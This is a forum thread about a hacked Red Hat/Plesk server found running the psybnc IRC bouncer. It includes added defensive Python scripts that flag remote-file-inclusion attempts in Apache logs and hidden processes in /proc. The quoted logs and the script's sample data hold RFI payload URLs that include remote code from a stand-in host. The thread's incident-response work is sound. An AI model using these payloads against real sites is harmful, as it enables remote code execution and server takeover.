
Someone installed psybnc in my server


sysoptech

Guest
Hi:
After my server hosting provider complained about an http exploitation attempt from my server to www.attackeddomain.com (I made up that domain to protect the innocent):

my.server.ip.address. - - [18/Jan/2009:00:08:53 +0200]"GET /forum/?cfg[bbs_dir]=http://www.attackeddomain.com/sik.txt? HTTP/1.1" 30$
my.server.ip.address - - [18/Jan/2009:00:08:53 +0200]"GET /forum/install/index.php HTTP/1.1" 404 111 "-""libwww-perl/5.805"
my.server.ip.address - - [18/Jan/2009:00:08:53 +0200]"GET /?cfg[bbs_dir]=http://www..attackeddomain.com/sik.txt? HTTP/1.1" 200 1257$2

I checked in my server and found entries like this in httpd/apache access_log:

127.0.0.1 - - [27/Jan/2009:15:23:46 -0600] "GET /?_SERVER%5bDOCUMENT_ROOT%5d=http://www.attackeddomain.com/sik.txt%3f HTTP/1.1" 403 3985 "-" "libwww-perl/5.805"
127.0.0.1 - - [27/Jan/2009:15:54:41 -0600] "GET /?_SERVER%5bDOCUMENT_ROOT%5d=http://www.attackeddomain.com/sik.txt%3f HTTP/1.1" 403 3985 "-" "libwww-perl/5.805"
127.0.0.1 - - [27/Jan/2009:16:20:40 -0600] "GET /?_SERVER%5bDOCUMENT_ROOT%5d=http://www.attackeddomain.com/sik.txt%3f HTTP/1.1" 403 3985 "-" "libwww-perl/5.805"

I've just found the following using lsof

psybnc 4863 apache cwd DIR 3,3 4096 12681232 /tmp/.psy
psybnc 4863 apache rtd DIR 3,3 4096 2 /
psybnc 4863 apache txt REG 3,3 202544 12681344 /tmp/.psy/psybnc (deleted)
psybnc 4863 apache mem REG 3,3 125736 14680066 /lib/ld-2.5.so
psybnc 4863 apache mem REG 3,3 1602128 14680082 /lib/libc-2.5.so
psybnc 4863 apache mem REG 3,3 208352 14680099 /lib/libm-2.5.so
psybnc 4863 apache mem REG 3,3 76400 14680121 /lib/libresolv-2.5.so
psybnc 4863 apache mem REG 3,3 21788 14680102 /lib/libnss_dns-2.5.so
psybnc 4863 apache mem REG 3,3 46680 14680104 /lib/libnss_files-2.5.so
psybnc 4863 apache 0r FIFO 0,6 14823 pipe
psybnc 4863 apache 1w CHR 1,3 1168 /dev/null
psybnc 4863 apache 2w CHR 1,3 1168 /dev/null
psybnc 4863 apache 3u IPv4 14844 TCP *:dc (LISTEN)
psybnc 4863 apache 4w REG 3,3 1222 12681223 /tmp/.psy/log/psybnc.log (deleted)
psybnc 4863 apache 5w REG 3,3 6 12681341 /tmp/.psy/psybnc.pid
psybnc 4863 apache 6w REG 3,3 0 12681226 /tmp/.psy/log/USER1.TRL
psybnc 4863 apache 7u sock 0,5 2613780 can't identify protocol

My server is a Red Hat Enterprise Linux Server release 5.2 with Plesk 8.6 that I use to host virtual domains.

My guess is that someone used a script to get access to my server and installed psybnc. I don't know how to get rid of psybnc or how to make sure that there's no other software the bad guys may have installed. I would also need to know how to prevent this from happening again on my server.

Can anyone give me some tips?

Best Regards

Raul
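The log lines and the lsof listing in the post above carry the two signals a responder would want to pull out mechanically: a query parameter whose value is itself a URL (the remote file inclusion attempt, where the trailing `?` turns whatever the vulnerable script appends to the include path into a harmless query string for the attacker's host), and a process whose executable was unlinked after it started, runs out of /tmp, and listens as the web-server user. The script below is an added example, not code from the original thread or from Plesk: it parses constructed Apache combined-log lines and constructed lsof output modelled on (not copied from) the ones quoted, and flags both. The status filter is the part that answers "which script was actually used": a 403 or 404 was stopped by the server, a 200 means the script ran with the attacker's parameter. The `EXPECTED_LISTENERS` set and the sample IPs are assumptions.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Apache "combined" format: %h %l %u %t "%r" %>s %b "%{Referer}i" "%{User-agent}i"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
    r'(?: "(?P<referer>[^"]*)" "(?P<ua>[^"]*)")?'
)
# A parameter value that is itself a URL is the signature of a remote file
# inclusion attempt against an include()/require() built from untrusted input.
REMOTE_URL = re.compile(r'^(https?|ftp)://', re.IGNORECASE)

# Constructed sample log (assumption, modelled on the entries in the post):
# two blocked attempts, one that got a 200, and two benign requests.
ACCESS_LOG = """\
203.0.113.5 - - [18/Jan/2009:00:08:53 +0200] "GET /forum/?cfg[bbs_dir]=http://www.attackeddomain.com/sik.txt? HTTP/1.1" 302 - "-" "libwww-perl/5.805"
203.0.113.5 - - [18/Jan/2009:00:08:53 +0200] "GET /forum/install/index.php HTTP/1.1" 404 111 "-" "libwww-perl/5.805"
127.0.0.1 - - [27/Jan/2009:15:23:46 -0600] "GET /?_SERVER%5bDOCUMENT_ROOT%5d=http://www.attackeddomain.com/sik.txt%3f HTTP/1.1" 403 3985 "-" "libwww-perl/5.805"
198.51.100.7 - - [27/Jan/2009:15:30:00 -0600] "GET /index.php?page=about HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.9 - - [27/Jan/2009:15:31:00 -0600] "GET /forum/?cfg[bbs_dir]=http://www.attackeddomain.com/sik.txt? HTTP/1.1" 200 1257 "-" "libwww-perl/5.805"
"""


def find_rfi(log_text):
    """One record per query parameter whose (URL-decoded) value points at a remote URL."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m.group('target'))
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            if REMOTE_URL.match(value):
                hits.append({
                    'ip': m.group('ip'),
                    'script': url.path,        # local script/directory to inspect
                    'param': name,             # the variable the attacker overrode
                    'payload': value,          # trailing '?' neutralises the rest of the include path
                    'status': int(m.group('status')),
                    'ua': m.group('ua') or '-',
                    # 403/404 were stopped by the server; 200 means the script ran with the payload
                    'served': m.group('status') == '200',
                })
    return hits


def scripts_to_review(hits):
    """Distinct (script, parameter) pairs that returned 200: the first files to audit."""
    return sorted({(h['script'], h['param']) for h in hits if h['served']})


# Constructed lsof output (assumption, modelled on the listing in the post) plus a
# normal httpd worker for contrast: its listener is inherited from the root parent.
LSOF_OUTPUT = """\
COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME
psybnc 4863 apache cwd DIR 3,3 4096 12681232 /tmp/.psy
psybnc 4863 apache rtd DIR 3,3 4096 2 /
psybnc 4863 apache txt REG 3,3 202544 12681344 /tmp/.psy/psybnc (deleted)
psybnc 4863 apache mem REG 3,3 1602128 14680082 /lib/libc-2.5.so
psybnc 4863 apache 3u IPv4 14844 TCP *:dc (LISTEN)
psybnc 4863 apache 4w REG 3,3 1222 12681223 /tmp/.psy/log/psybnc.log (deleted)
httpd 2210 apache cwd DIR 3,3 4096 2 /
httpd 2210 apache txt REG 3,3 318000 5000 /usr/sbin/httpd
httpd 2210 apache 3u IPv4 9001 TCP *:http (LISTEN)
"""

SCRATCH_DIRS = ('/tmp/', '/var/tmp/', '/dev/shm/')
WEB_USERS = {'apache', 'www-data', 'nobody'}
EXPECTED_LISTENERS = {'httpd'}   # assumption: only the web server should listen as the web user


def triage_lsof(lsof_text):
    """Flag an unlinked executable, a scratch-dir cwd/txt, and a rogue listener per lsof line."""
    findings = []
    for line in lsof_text.splitlines():
        fields = line.split(None, 4)
        if len(fields) < 5 or not fields[1].isdigit():
            continue                                  # header or malformed line
        command, pid, user, fd, rest = fields
        path_m = re.search(r'(/\S*)', rest)           # first absolute path in the NAME column
        path = path_m.group(1) if path_m else None
        if fd == 'txt' and rest.endswith('(deleted)'):
            findings.append((int(pid), 'executable unlinked while running', path))
        if fd in ('txt', 'cwd') and path and path.startswith(SCRATCH_DIRS):
            findings.append((int(pid), fd + ' in world-writable scratch dir', path))
        if rest.endswith('(LISTEN)') and user in WEB_USERS and command not in EXPECTED_LISTENERS:
            findings.append((int(pid), 'unexpected listener as ' + user, rest))
    return findings


if __name__ == '__main__':
    hits = find_rfi(ACCESS_LOG)
    for h in hits:
        print(h)
    print('audit first:', scripts_to_review(hits))
    for f in triage_lsof(LSOF_OUTPUT):
        print(f)
```

Two practical notes for a live box: run `lsof -nP` so ports show as numbers instead of /etc/services names like `dc`; and because the binary is already deleted from /tmp/.psy, copy it out before killing the process (`cp /proc/4863/exe /root/psybnc.bin`), since the kernel keeps the unlinked file readable through /proc/<pid>/exe only while the process lives. On a Plesk host with per-domain logs, run `find_rfi` over every vhost's access_log so the `script` column tells you which customer site carried the vulnerable code.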
 
You are already vulnerable .... you should reinstall, then consider using ASL and other security measures.
 
Hi:
Thanks for your prompt answer.
My server has about 200 hosting sites. Is there any way to find out which script or web page files were vulnerable or were used to perform this attack? If I were to reinstall the software on this server, I would need to copy my customers' hosting site files, and I would like to prevent this incident from happening again by isolating the vulnerable scripts.
Is there any other security setting I may try besides using ASL ?

Best Regards

Raul
 
psybnc is an IRC bouncer. It doesn't attack domains; it just serves as an intermediary/proxy between a client/user and an IRC server, and it was probably installed by one of your clients in order to be able to chat on IRC while at work, because the firewall there blocks the direct connection (http://www.psybnc.at/about.html).

Besides, the user agent on the attacks is libwww-perl/5.805, which is a Perl library, and thus it's something written in Perl that has been doing the attacks (psybnc isn't).
 
I know that an IRC bot is running because I can see it being denied outbound in our firewall. But I cannot seem to locate it.

What are some tips that might help me locate the source / web site?
 
Could be rootkitted, which is going to hide the process(es) from utilities like ps, lsof, etc. You can try digging deeper with statically compiled builds of chkrootkit or rkhunter. Otherwise you need to boot off of some trusted media to do a more thorough forensics investigation.
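The reply above is about a process that the usual tools cannot see. The cross-check that chkrootkit and unhide perform for that case is to stop trusting readdir and instead probe /proc by explicit PID: a library or kernel hook that filters directory listings does not filter a path opened by name, so a PID that answers at /proc/<pid>/status but is absent from `ps` output is either newly spawned or deliberately hidden. The script below is an added example, not code from the thread or from those tools. It assumes Linux, procps `ps -eo pid=`, and root (with `hidepid` mounts other users' entries are not visible at all). It is a quick first look, not a replacement for the trusted-media forensics the reply recommends: a kernel rootkit that hooks the VFS lookup itself will defeat this probe too.

```python
import os
import re
import subprocess


def pids_from_ps(ps_output):
    """Parse `ps -eo pid=` style output: one PID per line, header tolerated."""
    pids = set()
    for line in ps_output.splitlines():
        tok = line.strip()
        if tok.isdigit():
            pids.add(int(tok))
    return pids


def is_thread_group_leader(status_text, pid):
    """/proc/<tid> resolves for every thread; only count entries whose Tgid is the PID itself,
    otherwise every thread of a multi-threaded daemon would look like a hidden process."""
    m = re.search(r'^Tgid:\s*(\d+)', status_text, re.MULTILINE)
    return bool(m) and int(m.group(1)) == pid


def probe_proc(pid_max):
    """Walk /proc by explicit PID instead of readdir: a hooked getdents cannot hide a path opened by name."""
    present = set()
    for pid in range(1, pid_max + 1):
        try:
            with open(f'/proc/{pid}/status') as f:
                text = f.read()
        except PermissionError:
            present.add(pid)        # exists but unreadable (e.g. hidepid=1): still a real process
            continue
        except OSError:
            continue                # ENOENT / ESRCH: no such process
        if is_thread_group_leader(text, pid):
            present.add(pid)
    return present


def hidden_pids(visible, probed):
    """PIDs that answered in /proc but that the listing tool did not show."""
    return sorted(set(probed) - set(visible))


def describe(pid):
    """Best-effort identity for a candidate; exe ends in '(deleted)' for a dropped binary."""
    try:
        exe = os.readlink(f'/proc/{pid}/exe')
    except OSError:
        exe = '?'
    try:
        with open(f'/proc/{pid}/cmdline', 'rb') as f:
            cmd = f.read().replace(b'\0', b' ').decode(errors='replace').strip()
    except OSError:
        cmd = '?'
    return f'{pid}: exe={exe} cmdline={cmd!r}'


def ps_pids():
    out = subprocess.run(['ps', '-eo', 'pid='], capture_output=True, text=True, check=True).stdout
    return pids_from_ps(out)


def main():
    with open('/proc/sys/kernel/pid_max') as f:
        pid_max = int(f.read())                      # 32768 on RHEL 5, up to 4194304 on newer kernels
    candidates = hidden_pids(ps_pids(), probe_proc(pid_max))
    # Re-check: a process that started after the first ps ran is new, not hidden.
    later = ps_pids()
    confirmed = [p for p in candidates if os.path.exists(f'/proc/{p}') and p not in later]
    for p in confirmed:
        print('HIDDEN', describe(p))
    print(f'{len(confirmed)} hidden process(es)')
    return confirmed


if __name__ == '__main__':
    main()
```

Probing the full PID range costs a few seconds on a 32768-PID kernel and well under a minute on a 4194304-PID one. If `ps` has been replaced, its output is exactly what a rootkit controls, so a static `busybox ps` or a statically linked chkrootkit from read-only media is the comparison to trust; the pure functions above work the same on whatever listing you feed them.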
 